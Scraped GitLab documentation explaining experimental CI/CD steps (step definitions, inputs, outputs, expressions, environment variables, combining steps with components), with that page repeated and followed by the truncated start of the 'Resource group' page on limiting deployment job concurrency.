run: - name: say_hi step: gitlab.com/gitlab-org/ci-cd/runner-tools/echo-step@v1.0.0 inputs: message: "hello, ${{job.CI_SAY_HI_TO}}" ``` When this job runs, the message `hello, Sally` is printed to job log. The definition of the echo step is: ```yaml spec: inputs: message: type: string --- exec: command: - bash - -c - echo '${{inputs.message}}' ``` ## Use CI/CD Steps Configure a GitLab CI/CD job to use CI Steps with the `run` keyword. You cannot use `before_script`, `after_script`, or `script` in a job when you are running CI/CD Steps. The `run` keyword accepts a list of steps to run. Steps are run one at a time in the order they are defined in the list. Each list item has a `name` and either `step`, `script`, or `action`. Name must consist only of alphanumeric characters and underscores, and must not start with a number. ### Run a step Run a step by providing the [step location](#step-location) using the `step` keyword. Inputs and environment variables can be passed to the step, and these can contain expressions that interpolate values. Steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md). For example, the echo step loaded from the Git repository `gitlab.com/components/echo` receives the environment variable `USER: Fred` and the input `message: hello Sally`: ```yaml job: variables: CI_SAY_HI_TO: "Sally" run: - name: say_hi step: gitlab.com/components/echo@v1.0.0 env: USER: "Fred" inputs: message: "hello ${{job.CI_SAY_HI_TO}}" ``` ### Run a script Run a script in a shell with the `script` keyword. Environment variables passed to scripts using `env` are set in the shell. Script steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md). For example, the following script prints the GitLab user to the job log: ```yaml my-job: run: - name: say_hi script: echo hello ${{job.GITLAB_USER_LOGIN}} ``` Script steps use the `bash` shell, falling back to use `sh` if bash is not found. ### Run a GitHub action Run GitHub actions with the `action` keyword. Inputs and environment variables are passed directly to the action, and action outputs are returned as step outputs. Action steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md). Running actions requires the `dind` service. For more information, see [Use Docker to build Docker images](../docker/using_docker_build.md). For example, the following step uses `action` to make `yq` available: ```yaml my-job: run: - name: say_hi_again action: mikefarah/yq@master inputs: cmd: echo ["hi ${{job.GITLAB_USER_LOGIN}} again!"] | yq .[0] ``` #### Known issues Actions running in GitLab do not support uploading artifacts directly. Artifacts must be written to the file system and cache instead, and selected with the existing [`artifacts` keyword](../yaml/_index.md#artifacts) and [`cache` keyword](../yaml/_index.md#cache). ### Step location Steps are loaded from a relative path on the file system, GitLab.com repositories, or any other Git source. #### Load a step from the file system Load a step from the file system using a relative path that starts with a full-stop `.`. The folder referenced by the path must contain a `step.yml` step definition file. Path separators must always use forward-slashes `/`, regardless of operating system. For example: ```yaml - name: my-step step: ./path/to/my-step ``` #### Load a step from a Git repository Load a step from a Git repository by supplying the URL and revision (commit, branch, or tag) of the repository. You can also specify the relative directory and filename of the step in the `steps` folder of the repository. If the URL is specified without a directory, then `step.yml` is loaded from the `steps` folder. For example: - Specify the step with a branch: ```yaml job: run: - name: specifying_a_branch step: gitlab.com/components/echo@main ``` - Specify the step with a tag: ```yaml job: run: - name: specifying_a_tag step: gitlab.com/components/echo@v1.0.0 ``` - Specify the step with a directory, filename, and Git commit in a repository: ```yaml job: run: - name: specifying_a_directory_file_and_commit_within_the_repository step: gitlab.com/components/echo/-/reverse/my-step.yml@3c63f399ace12061db4b8b9a29f522f41a3d7f25 ``` To specify a folder or file outside the `steps` folder, use the expanded `step` syntax: - Specify a directory and filename relative to the repository root. ```yaml job: run: - name: specifying_a_directory_outside_steps step: git: url: gitlab.com/components/echo rev: main dir: my-steps/sub-directory # optional, defaults to the repository root file: my-step.yml # optional, defaults to `step.yml` ``` ### Expressions Expressions are a mini-language enclosed in double curly-braces `${{ }}`. Expressions are evaluated just prior to step execution in the job environment and can be used in: - Input values - Environment variable values - Step location URL - The executable command - The executable work directory - Outputs in a sequence of steps - The `script` step - The `action` step Expressions can reference the following variables: | Variable | Example | Description | |:----------------------------|:--------------------------------------------------------------|:------------| | `env` | `${{env.HOME}}` | Access environment variables set in the execution environment or in previous steps. | | `export_file` | `echo '{"name":"NAME","value":"Fred"}' >${{export_file}}` | The path to the [export file](#export-an-environment-variable). Write to this file to export environment variables for use by subsequent running steps. | | `inputs` | `${{inputs.message}}` | Access the step's inputs. | | `job` | `${{job.GITLAB_USER_NAME}}` | Access GitLab CI/CD variables, limited to those starting with `CI_`, `DOCKER_` or `GITLAB_`. | | `output_file` | `echo '{"name":"meaning_life","value":42}' >${{output_file}}` | The path to the [output file](#return-an-output). Write to this file to set output variables from the step. | | `step_dir` | `work_dir: ${{step_dir}}` | The directory where the step has been downloaded. Use to refer to files in the step, or to set the working directory of an executable step. | | `steps.[step_name].outputs` | `${{steps.my_step.outputs.name}}` | Access [outputs](#specify-outputs) from previously executed steps. Choose the specific step using the step name. | | `work_dir` | `${{work_dir}}` | The working directory of an executing step. | Expressions are different from template interpolation which uses double square-brackets (`$[[ ]]`) and are evaluated during job generation. Expressions only have access to CI/CD job variables with names starting with `CI_`, `DOCKER_`, or `GITLAB_`. Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps can access all CI/CD job variables. ### Using prior step outputs Step inputs can reference outputs from prior steps by referencing the step name and output variable name. For example, if the `gitlab.com/components/random-string` step defined an output variable called `random_value`: ```yaml job: run: - name: generate_rand step: gitlab.com/components/random - name: echo_random step: gitlab.com/components/echo inputs: message: "The random value is: ${{steps.generate_rand.outputs.random_value}}" ``` ### Environment variables Steps can [set](#set-environment-variables) environment variables, [export](#export-an-environment-variable) environment variables, and environment variables can be passed in when using `step`, `script`, or `action`. Environment variable precedence, from highest to lowest precedence, are variables set: 1. By using `env` keyword in the `step.yml`. 1. By using the `env` keyword passed to a step in a sequence of steps. 1. By using the `env` keyword for all steps in a sequence. 1. Where a previously run step has written to `${{export_file}}`. 1. By the Runner. 1. By the container. ## Create your own step Create your own step by performing the following tasks: 1. Create a GitLab project, a Git repository, or a directory on a file system that is accessible when the CI/CD job runs. 1. Create a `step.yml` file and place it in the root folder of the project, repository, or directory. 1. Define the [specification](#the-step-specification) for the step in the `step.yml`. 1. Define the [definition](#the-step-definition) for the step in the `step.yml`. 1. Add any files that your step uses to the project, repository, or directory. After the step is created, you can [use the step in a job](#run-a-step). ### The step specification The step specification is the first of two documents contained in the step `step.yml`. The specification defines inputs and outputs that the step receives and returns. #### Specify inputs Input names can only use alphanumeric characters and underscores, and must not start with a number. Inputs must have a type, and they can optionally specify a default value. An input with no default value is a required input, it must be specified when using the step. Inputs must be one of the following types. | Type | Example | Description | |:----------|:------------------------|:------------| | `array` | `["a","b"]` | A list of un-typed items. | | `boolean` | `true` | True or false. | | `number` | `56.77` | 64 bit float. | | `string` | `"brown cow"` | Text. | | `struct` | `{"k1":"v1","k2":"v2"}` | Structured content. | For example, to specify that the step accepts an optional input called `greeting` of type `string`: ```yaml spec: inputs: greeting: type: string default: "hello, world" --- ``` To provide the input when using the step: ```yaml run: - name: my_step step: ./my-step inputs: greeting: "hello, another world" ``` #### Specify outputs Similar to inputs, output names can only use alphanumeric characters and underscores, and must not start with a number. Outputs must have a type, and they can optionally specify a default value. The default value is returned when the step doesn't return the output. Outputs must be one of the following types. | Type | Example | Description | |:-------------|:------------------------|:------------| | `array` | `["a","b"]` | A list of un-typed items. | | `boolean` | `true` | True or false. | | `number` | `56.77` | 64 bit float. | | `string` | `"brown cow"` | Text. | | `struct` | `{"k1":"v1","k2":"v2"}` | Structured content. | For example, to specify that the step returns an output called `value` of type `number`: ```yaml spec: outputs: value: type: number --- ``` To use the output when using the step: ```yaml run: - name: random_generator step: ./random_gen - name: echo_number step: ./echo inputs: message: "Random number generated was ${{step.random_generator.outputs.value}}" ``` #### Specify delegated outputs Instead of specifying output names and types, outputs can be entirely delegated to a sub-step. The outputs returned by the sub-step are returned by your step. The `delegate` keyword in the step definition determines which sub-step outputs are returned by the step. For example, the following step returns outputs returned by the `random_gen` step. ```yaml spec: outputs: delegate --- run: - name: random_generator step: ./random_gen delegate: random_generator ``` #### Specify no inputs or outputs A step might not require any inputs or return any outputs. This could be when a step only writes to disk, sets an environment variable, or prints to STDOUT. In this case, `spec:` is empty: ```yaml spec: --- ``` ### The step definition Steps can: - Set environment variables - Execute a command - Run a sequence of other steps. #### Set environment variables Set environment variables by using the `env` keyword. Environment variable names can only use alphanumeric characters and underscores, and must not start with a number. Environment variables are made available either to the executable command or to all of the steps if running a sequence of steps. For example: ```yaml spec: --- env: FIRST_NAME: Sally LAST_NAME: Seashells run: # omitted for brevity ``` Steps only have access to a subset of environment variables from the runner environment. Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps can access all environment variables. #### Execute a command A step declares it executes a command by using the `exec` keyword. The command must be specified, but the working directory (`work_dir`) is optional. Environment variables set by the step are available to the running process. For example, the following step prints the step directory to the job log: ```yaml spec: --- exec: work_dir: ${{step_dir}} command: - bash - -c - "echo ${PWD}" ``` {{< alert type="note" >}} Any dependency required by the executing step should also be installed by the step. For example, if a step calls `go`, it should first install it. {{< /alert >}} ##### Return an output Executable steps return an output by adding a line to the `${{output_file}}` in JSON Line format. Each line is a JSON object with `name` and `value` key pairs. The `name` must be a string, and the `value` must be a type that matches the output type in the step specification: | Step specification type | Expected JSONL value type | |:------------------------|:--------------------------| | `array` | `array` | | `boolean` | `boolean` | | `number` | `number` | | `string` | `string` | | `struct` | `object` | For example, to return the output named `car` with `string` value `Range Rover`: ```yaml spec: outputs: car: type: string --- exec: command: - bash - -c - echo '{"name":"car","value":"Range Rover"}' >${{output_file}} ``` ##### Export an environment variable Executable steps export an environment variable by adding a line to the `${{export_file}}` in JSON Line format. Each line is a JSON object with `name` and `value` key pairs. Both `name` and `value` must be strings. For example, to set the variable `GOPATH` to value `/go`: ```yaml spec: --- exec: command: - bash - -c - echo '{"name":"GOPATH","value":"/go"}' >${{export_file}} ``` #### Run a sequence of steps A step declares it runs a sequence of steps using the `steps` keyword. Steps run one at a time in the order they are defined in the list. This syntax is the same as the `run` keyword. Steps must have a name consisting only of alphanumeric characters and underscores, and must not start with a number. For example, this step installs Go, then runs a second step that expects Go to already have been installed: ```yaml spec: --- run: - name: install_go step: ./go-steps/install-go inputs: version: "1.22" - name: format_go_code step: ./go-steps/go-fmt inputs: code: path/to/go-code ``` ##### Return an output Outputs are returned from a sequence of steps by using the `outputs` keyword. The type of value in the output must match the type of the output in the step specification. For example, the following step returns the installed Java version as an output. This assumes the `install_java` step returns an output named `java_version`. ```yaml spec: outputs: java_version: type: string --- run: - name: install_java step: ./common/install-java outputs: java_version: "the java version is ${{steps.install_java.outputs.java_version}}" ``` Alternatively, all outputs of a sub-step can be returned using the `delegate` keyword. For example: ```yaml spec: outputs: delegate --- run: - name: install_java step: ./common/install-java delegate: install_java ``` ## Combine CI/CD Components and CI/CD Steps [CI/CD components](../components/_index.md) are reusable single pipeline configuration units. They are included in a pipeline when it is created, adding jobs and configuration to the pipeline. Files such as common scripts or programs from the component project cannot be referenced from a CI/CD job. CI/CD Steps are reusable units of a job. When the job runs, the referenced step is downloaded to the execution environment or image, bringing along any extra files included with the step. Execution of the step replaces the `script` in the job. Components and steps work well together to create solutions for CI/CD pipelines. Steps handle the complexity of how jobs are composed, and automatically retrieve the files necessary to run the job. Components provide a method to import job configuration, but hide the underlying job composition from the user. Steps and components use different syntax for expressions to help differentiate the expression types. Component expressions use square brackets `$[[ ]]` and are evaluated during pipeline creation. Step expressions use braces `${{ }}` and are evaluated during job execution, just before executing the step. For example, a project could use a component that adds a job to format Go code: - In the project's `.gitlab-ci.yml` file: ```yaml include: - component: gitlab.com/my-components/go@main inputs: fmt_packages: "./..." ``` - Internally, the component uses CI/CD steps to compose the job, which installs Go then runs the formatter. In the component's `templates/go.yml` file: ```yaml spec: inputs: fmt_packages: description: The Go packages that will be formatted using the Go formatter. go_version: default: "1.22" description: The version of Go to install before running go fmt. --- format code: run: - name: install_go step: ./languages/go/install inputs: version: $[[ inputs.go_version ]] # version set to the value of the component input go_version - name: format_code step: ./languages/go/go-fmt inputs: go_binary: ${{ steps.install_go.outputs.go_binary }} # go_binary set to the value of the go_binary output from the previous step fmt_packages: $[[ inputs.fmt_packages ]] # fmt_packages set to the value of the component input fmt_packages ``` In this example, the CI/CD component hides the complexity of the steps from the component author. ## Troubleshooting ### Fetching steps from an HTTPS URL An error message such as `tls: failed to verify certificate: x509: certificate signed by unknown authority` indicates that the operating system does not recognize or trust the server hosting the step. A common cause is when steps are run in a job with a Docker image that doesn't have any trusted root certificates installed. Resolve the issue by installing certificates in the container or by baking them into the job `image`. You can use a `script` step to install dependencies in the container before fetching any steps. For example: ```yaml ubuntu_job: image: ubuntu:24.04 run: - name: install_certs # Install trusted certificates first script: apt update && apt install --assume-yes --no-install-recommends ca-certificates - name: echo_step # With trusted certificates, use HTTPS without errors step: https://gitlab.com/user/my_steps/hello_world@main ```
--- stage: Verify group: Runner info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: CI/CD steps breadcrumbs: - doc - ci - steps --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated - Status: Experiment {{< /details >}} Steps are reusable units of a job that when composed together replace the `script` used in a GitLab CI/CD job. You are not required to use steps. However, the reusability, composability, testability, and independence of steps make it easier to understand and maintain CI/CD pipeline. To get started, you can try the [Set up steps tutorial](../../tutorials/setup_steps/_index.md). To start creating your own steps, see [Creating your own step](#create-your-own-step). To understand how pipelines can benefit from using both CI/CD Components and CI/CD Steps, see [Combine CI/CD Components and CI/CD Steps](#combine-cicd-components-and-cicd-steps). This experimental feature is still in active development and might have breaking changes at any time. Review the [changelog](https://gitlab.com/gitlab-org/step-runner/-/blob/main/CHANGELOG.md) for full details on any breaking changes. {{< alert type="note" >}} In GitLab Runner 17.11 and later, when you use the Docker executor, GitLab Runner injects the step-runner binary into the build container. For all other executors, ensure that the step-runner binary is in the execution environment. Support for the legacy Docker image `registry.gitlab.com/gitlab-org/step-runner:v0`, maintained by the step runner team, ends in GitLab 18.0. {{< /alert >}} ## Step workflow A step either runs a sequence of steps or executes a command. Each step specifies inputs and outputs, and has access to CI/CD job variables, environment variables, and resources such as the file system and networking. Steps are hosted locally on the file system, in GitLab.com repositories, or in any other Git source. Additionally, steps: - Run in a Docker container created by the Steps team, you can review the [`Dockerfile`](https://gitlab.com/gitlab-org/step-runner/-/blob/main/Dockerfile). Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps will run inside the environment defined by the CI/CD job. - Are specific to Linux. Follow [epic 15074](https://gitlab.com/groups/gitlab-org/-/epics/15074) to track when steps supports multiple operating systems. For example, this job uses the [`run`](../yaml/_index.md#run) CI/CD keyword to run a step: ```yaml job: variables: CI_SAY_HI_TO: "Sally" run: - name: say_hi step: gitlab.com/gitlab-org/ci-cd/runner-tools/echo-step@v1.0.0 inputs: message: "hello, ${{job.CI_SAY_HI_TO}}" ``` When this job runs, the message `hello, Sally` is printed to job log. The definition of the echo step is: ```yaml spec: inputs: message: type: string --- exec: command: - bash - -c - echo '${{inputs.message}}' ``` ## Use CI/CD Steps Configure a GitLab CI/CD job to use CI Steps with the `run` keyword. You cannot use `before_script`, `after_script`, or `script` in a job when you are running CI/CD Steps. The `run` keyword accepts a list of steps to run. Steps are run one at a time in the order they are defined in the list. Each list item has a `name` and either `step`, `script`, or `action`. Name must consist only of alphanumeric characters and underscores, and must not start with a number. ### Run a step Run a step by providing the [step location](#step-location) using the `step` keyword. Inputs and environment variables can be passed to the step, and these can contain expressions that interpolate values. Steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md). For example, the echo step loaded from the Git repository `gitlab.com/components/echo` receives the environment variable `USER: Fred` and the input `message: hello Sally`: ```yaml job: variables: CI_SAY_HI_TO: "Sally" run: - name: say_hi step: gitlab.com/components/echo@v1.0.0 env: USER: "Fred" inputs: message: "hello ${{job.CI_SAY_HI_TO}}" ``` ### Run a script Run a script in a shell with the `script` keyword. Environment variables passed to scripts using `env` are set in the shell. Script steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md). For example, the following script prints the GitLab user to the job log: ```yaml my-job: run: - name: say_hi script: echo hello ${{job.GITLAB_USER_LOGIN}} ``` Script steps use the `bash` shell, falling back to use `sh` if bash is not found. ### Run a GitHub action Run GitHub actions with the `action` keyword. Inputs and environment variables are passed directly to the action, and action outputs are returned as step outputs. Action steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md). Running actions requires the `dind` service. For more information, see [Use Docker to build Docker images](../docker/using_docker_build.md). For example, the following step uses `action` to make `yq` available: ```yaml my-job: run: - name: say_hi_again action: mikefarah/yq@master inputs: cmd: echo ["hi ${{job.GITLAB_USER_LOGIN}} again!"] | yq .[0] ``` #### Known issues Actions running in GitLab do not support uploading artifacts directly. Artifacts must be written to the file system and cache instead, and selected with the existing [`artifacts` keyword](../yaml/_index.md#artifacts) and [`cache` keyword](../yaml/_index.md#cache). ### Step location Steps are loaded from a relative path on the file system, GitLab.com repositories, or any other Git source. #### Load a step from the file system Load a step from the file system using a relative path that starts with a full-stop `.`. The folder referenced by the path must contain a `step.yml` step definition file. Path separators must always use forward-slashes `/`, regardless of operating system. For example: ```yaml - name: my-step step: ./path/to/my-step ``` #### Load a step from a Git repository Load a step from a Git repository by supplying the URL and revision (commit, branch, or tag) of the repository. You can also specify the relative directory and filename of the step in the `steps` folder of the repository. If the URL is specified without a directory, then `step.yml` is loaded from the `steps` folder. For example: - Specify the step with a branch: ```yaml job: run: - name: specifying_a_branch step: gitlab.com/components/echo@main ``` - Specify the step with a tag: ```yaml job: run: - name: specifying_a_tag step: gitlab.com/components/echo@v1.0.0 ``` - Specify the step with a directory, filename, and Git commit in a repository: ```yaml job: run: - name: specifying_a_directory_file_and_commit_within_the_repository step: gitlab.com/components/echo/-/reverse/my-step.yml@3c63f399ace12061db4b8b9a29f522f41a3d7f25 ``` To specify a folder or file outside the `steps` folder, use the expanded `step` syntax: - Specify a directory and filename relative to the repository root. ```yaml job: run: - name: specifying_a_directory_outside_steps step: git: url: gitlab.com/components/echo rev: main dir: my-steps/sub-directory # optional, defaults to the repository root file: my-step.yml # optional, defaults to `step.yml` ``` ### Expressions Expressions are a mini-language enclosed in double curly-braces `${{ }}`. Expressions are evaluated just prior to step execution in the job environment and can be used in: - Input values - Environment variable values - Step location URL - The executable command - The executable work directory - Outputs in a sequence of steps - The `script` step - The `action` step Expressions can reference the following variables: | Variable | Example | Description | |:----------------------------|:--------------------------------------------------------------|:------------| | `env` | `${{env.HOME}}` | Access environment variables set in the execution environment or in previous steps. | | `export_file` | `echo '{"name":"NAME","value":"Fred"}' >${{export_file}}` | The path to the [export file](#export-an-environment-variable). Write to this file to export environment variables for use by subsequent running steps. | | `inputs` | `${{inputs.message}}` | Access the step's inputs. | | `job` | `${{job.GITLAB_USER_NAME}}` | Access GitLab CI/CD variables, limited to those starting with `CI_`, `DOCKER_` or `GITLAB_`. | | `output_file` | `echo '{"name":"meaning_life","value":42}' >${{output_file}}` | The path to the [output file](#return-an-output). Write to this file to set output variables from the step. | | `step_dir` | `work_dir: ${{step_dir}}` | The directory where the step has been downloaded. Use to refer to files in the step, or to set the working directory of an executable step. | | `steps.[step_name].outputs` | `${{steps.my_step.outputs.name}}` | Access [outputs](#specify-outputs) from previously executed steps. Choose the specific step using the step name. | | `work_dir` | `${{work_dir}}` | The working directory of an executing step. | Expressions are different from template interpolation which uses double square-brackets (`$[[ ]]`) and are evaluated during job generation. Expressions only have access to CI/CD job variables with names starting with `CI_`, `DOCKER_`, or `GITLAB_`. Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps can access all CI/CD job variables. ### Using prior step outputs Step inputs can reference outputs from prior steps by referencing the step name and output variable name. For example, if the `gitlab.com/components/random-string` step defined an output variable called `random_value`: ```yaml job: run: - name: generate_rand step: gitlab.com/components/random - name: echo_random step: gitlab.com/components/echo inputs: message: "The random value is: ${{steps.generate_rand.outputs.random_value}}" ``` ### Environment variables Steps can [set](#set-environment-variables) environment variables, [export](#export-an-environment-variable) environment variables, and environment variables can be passed in when using `step`, `script`, or `action`. Environment variable precedence, from highest to lowest precedence, are variables set: 1. By using `env` keyword in the `step.yml`. 1. By using the `env` keyword passed to a step in a sequence of steps. 1. By using the `env` keyword for all steps in a sequence. 1. Where a previously run step has written to `${{export_file}}`. 1. By the Runner. 1. By the container. ## Create your own step Create your own step by performing the following tasks: 1. Create a GitLab project, a Git repository, or a directory on a file system that is accessible when the CI/CD job runs. 1. Create a `step.yml` file and place it in the root folder of the project, repository, or directory. 1. Define the [specification](#the-step-specification) for the step in the `step.yml`. 1. Define the [definition](#the-step-definition) for the step in the `step.yml`. 1. Add any files that your step uses to the project, repository, or directory. After the step is created, you can [use the step in a job](#run-a-step). ### The step specification The step specification is the first of two documents contained in the step `step.yml`. The specification defines inputs and outputs that the step receives and returns. #### Specify inputs Input names can only use alphanumeric characters and underscores, and must not start with a number. Inputs must have a type, and they can optionally specify a default value. An input with no default value is a required input, it must be specified when using the step. Inputs must be one of the following types. | Type | Example | Description | |:----------|:------------------------|:------------| | `array` | `["a","b"]` | A list of un-typed items. | | `boolean` | `true` | True or false. | | `number` | `56.77` | 64 bit float. | | `string` | `"brown cow"` | Text. | | `struct` | `{"k1":"v1","k2":"v2"}` | Structured content. | For example, to specify that the step accepts an optional input called `greeting` of type `string`: ```yaml spec: inputs: greeting: type: string default: "hello, world" --- ``` To provide the input when using the step: ```yaml run: - name: my_step step: ./my-step inputs: greeting: "hello, another world" ``` #### Specify outputs Similar to inputs, output names can only use alphanumeric characters and underscores, and must not start with a number. Outputs must have a type, and they can optionally specify a default value. The default value is returned when the step doesn't return the output. Outputs must be one of the following types. | Type | Example | Description | |:-------------|:------------------------|:------------| | `array` | `["a","b"]` | A list of un-typed items. | | `boolean` | `true` | True or false. | | `number` | `56.77` | 64 bit float. | | `string` | `"brown cow"` | Text. | | `struct` | `{"k1":"v1","k2":"v2"}` | Structured content. | For example, to specify that the step returns an output called `value` of type `number`: ```yaml spec: outputs: value: type: number --- ``` To use the output when using the step: ```yaml run: - name: random_generator step: ./random_gen - name: echo_number step: ./echo inputs: message: "Random number generated was ${{step.random_generator.outputs.value}}" ``` #### Specify delegated outputs Instead of specifying output names and types, outputs can be entirely delegated to a sub-step. The outputs returned by the sub-step are returned by your step. The `delegate` keyword in the step definition determines which sub-step outputs are returned by the step. For example, the following step returns outputs returned by the `random_gen` step. ```yaml spec: outputs: delegate --- run: - name: random_generator step: ./random_gen delegate: random_generator ``` #### Specify no inputs or outputs A step might not require any inputs or return any outputs. This could be when a step only writes to disk, sets an environment variable, or prints to STDOUT. In this case, `spec:` is empty: ```yaml spec: --- ``` ### The step definition Steps can: - Set environment variables - Execute a command - Run a sequence of other steps. #### Set environment variables Set environment variables by using the `env` keyword. Environment variable names can only use alphanumeric characters and underscores, and must not start with a number. Environment variables are made available either to the executable command or to all of the steps if running a sequence of steps. For example: ```yaml spec: --- env: FIRST_NAME: Sally LAST_NAME: Seashells run: # omitted for brevity ``` Steps only have access to a subset of environment variables from the runner environment. Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps can access all environment variables. #### Execute a command A step declares it executes a command by using the `exec` keyword. The command must be specified, but the working directory (`work_dir`) is optional. Environment variables set by the step are available to the running process. For example, the following step prints the step directory to the job log: ```yaml spec: --- exec: work_dir: ${{step_dir}} command: - bash - -c - "echo ${PWD}" ``` {{< alert type="note" >}} Any dependency required by the executing step should also be installed by the step. For example, if a step calls `go`, it should first install it. {{< /alert >}} ##### Return an output Executable steps return an output by adding a line to the `${{output_file}}` in JSON Line format. Each line is a JSON object with `name` and `value` key pairs. The `name` must be a string, and the `value` must be a type that matches the output type in the step specification: | Step specification type | Expected JSONL value type | |:------------------------|:--------------------------| | `array` | `array` | | `boolean` | `boolean` | | `number` | `number` | | `string` | `string` | | `struct` | `object` | For example, to return the output named `car` with `string` value `Range Rover`: ```yaml spec: outputs: car: type: string --- exec: command: - bash - -c - echo '{"name":"car","value":"Range Rover"}' >${{output_file}} ``` ##### Export an environment variable Executable steps export an environment variable by adding a line to the `${{export_file}}` in JSON Line format. Each line is a JSON object with `name` and `value` key pairs. Both `name` and `value` must be strings. For example, to set the variable `GOPATH` to value `/go`: ```yaml spec: --- exec: command: - bash - -c - echo '{"name":"GOPATH","value":"/go"}' >${{export_file}} ``` #### Run a sequence of steps A step declares it runs a sequence of steps using the `steps` keyword. Steps run one at a time in the order they are defined in the list. This syntax is the same as the `run` keyword. Steps must have a name consisting only of alphanumeric characters and underscores, and must not start with a number. For example, this step installs Go, then runs a second step that expects Go to already have been installed: ```yaml spec: --- run: - name: install_go step: ./go-steps/install-go inputs: version: "1.22" - name: format_go_code step: ./go-steps/go-fmt inputs: code: path/to/go-code ``` ##### Return an output Outputs are returned from a sequence of steps by using the `outputs` keyword. The type of value in the output must match the type of the output in the step specification. For example, the following step returns the installed Java version as an output. This assumes the `install_java` step returns an output named `java_version`. ```yaml spec: outputs: java_version: type: string --- run: - name: install_java step: ./common/install-java outputs: java_version: "the java version is ${{steps.install_java.outputs.java_version}}" ``` Alternatively, all outputs of a sub-step can be returned using the `delegate` keyword. For example: ```yaml spec: outputs: delegate --- run: - name: install_java step: ./common/install-java delegate: install_java ``` ## Combine CI/CD Components and CI/CD Steps [CI/CD components](../components/_index.md) are reusable single pipeline configuration units. They are included in a pipeline when it is created, adding jobs and configuration to the pipeline. Files such as common scripts or programs from the component project cannot be referenced from a CI/CD job. CI/CD Steps are reusable units of a job. When the job runs, the referenced step is downloaded to the execution environment or image, bringing along any extra files included with the step. Execution of the step replaces the `script` in the job. Components and steps work well together to create solutions for CI/CD pipelines. Steps handle the complexity of how jobs are composed, and automatically retrieve the files necessary to run the job. Components provide a method to import job configuration, but hide the underlying job composition from the user. Steps and components use different syntax for expressions to help differentiate the expression types. Component expressions use square brackets `$[[ ]]` and are evaluated during pipeline creation. Step expressions use braces `${{ }}` and are evaluated during job execution, just before executing the step. For example, a project could use a component that adds a job to format Go code: - In the project's `.gitlab-ci.yml` file: ```yaml include: - component: gitlab.com/my-components/go@main inputs: fmt_packages: "./..." ``` - Internally, the component uses CI/CD steps to compose the job, which installs Go then runs the formatter. In the component's `templates/go.yml` file: ```yaml spec: inputs: fmt_packages: description: The Go packages that will be formatted using the Go formatter. go_version: default: "1.22" description: The version of Go to install before running go fmt. --- format code: run: - name: install_go step: ./languages/go/install inputs: version: $[[ inputs.go_version ]] # version set to the value of the component input go_version - name: format_code step: ./languages/go/go-fmt inputs: go_binary: ${{ steps.install_go.outputs.go_binary }} # go_binary set to the value of the go_binary output from the previous step fmt_packages: $[[ inputs.fmt_packages ]] # fmt_packages set to the value of the component input fmt_packages ``` In this example, the CI/CD component hides the complexity of the steps from the component author. ## Troubleshooting ### Fetching steps from an HTTPS URL An error message such as `tls: failed to verify certificate: x509: certificate signed by unknown authority` indicates that the operating system does not recognize or trust the server hosting the step. A common cause is when steps are run in a job with a Docker image that doesn't have any trusted root certificates installed. Resolve the issue by installing certificates in the container or by baking them into the job `image`. You can use a `script` step to install dependencies in the container before fetching any steps. For example: ```yaml ubuntu_job: image: ubuntu:24.04 run: - name: install_certs # Install trusted certificates first script: apt update && apt install --assume-yes --no-install-recommends ca-certificates - name: echo_step # With trusted certificates, use HTTPS without errors step: https://gitlab.com/user/my_steps/hello_world@main ```
https://docs.gitlab.com/ci/resource_groups
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/resource_groups
[ "doc", "ci", "resource_groups" ]
_index.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Resource group
Control the job concurrency in GitLab CI/CD
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} By default, pipelines in GitLab CI/CD run concurrently. Concurrency is an important factor to improve the feedback loop in merge requests, however, there are some situations that you may want to limit the concurrency on deployment jobs to run them one by one. Use resource groups to strategically control the concurrency of the jobs for optimizing your continuous deployments workflow with safety. ## Add a resource group You can add only one resource to a resource group. Provided that you have the following pipeline configuration (`.gitlab-ci.yml` file in your repository): ```yaml build: stage: build script: echo "Your build script" deploy: stage: deploy script: echo "Your deployment script" environment: production ``` Every time you push a new commit to a branch, it runs a new pipeline that has two jobs `build` and `deploy`. But if you push multiple commits in a short interval, multiple pipelines start running simultaneously, for example: - The first pipeline runs the jobs `build` -> `deploy` - The second pipeline runs the jobs `build` -> `deploy` In this case, the `deploy` jobs across different pipelines could run concurrently to the `production` environment. Running multiple deployment scripts to the same infrastructure could harm/confuse the instance and leave it in a corrupted state in the worst case. To ensure that a `deploy` job runs once at a time, you can specify [`resource_group` keyword](../yaml/_index.md#resource_group) to the concurrency sensitive job: ```yaml deploy: # ... resource_group: production ``` With this configuration, the safety on the deployments is assured while you can still run `build` jobs concurrently for maximizing the pipeline efficiency. ## Prerequisites - Familiarity with [GitLab CI/CD pipelines](../pipelines/_index.md) - Familiarity with [GitLab environments and deployments](../environments/_index.md) - At least the Developer role for the project to configure CI/CD pipelines. ## Process modes You can select a process mode to control the job concurrency for your deployment preferences. The following modes are supported: | Process mode | Description | When to use | |---------------|-------------|-------------| | `unordered` | The default process mode. Processes jobs whenever a job is ready to run. | The execution order of jobs is not important. The easiest option to use. | | `oldest_first` | When a resource is free, picks the first job from the list of upcoming jobs sorted by pipeline ID in ascending order. | You want to execute jobs from the oldest pipeline first. Less efficient than `unordered` mode, but safer for continuous deployments. | | `newest_first` | When a resource is free, picks the first job from 